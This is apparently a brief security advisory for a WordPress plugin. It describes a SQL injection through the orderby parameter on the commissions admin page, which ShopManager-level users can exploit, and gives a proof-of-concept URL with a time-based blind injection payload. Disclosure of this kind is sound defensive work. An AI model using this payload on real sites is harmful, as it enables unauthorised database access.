The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as ShopManager
As ShopManager, open the URL below
https://example.com/wp-admin/admin.php?page=wcpv-commissions&orderby=order_id`,(select+sleep(10)+from+dual+where+database()+like+database())--+-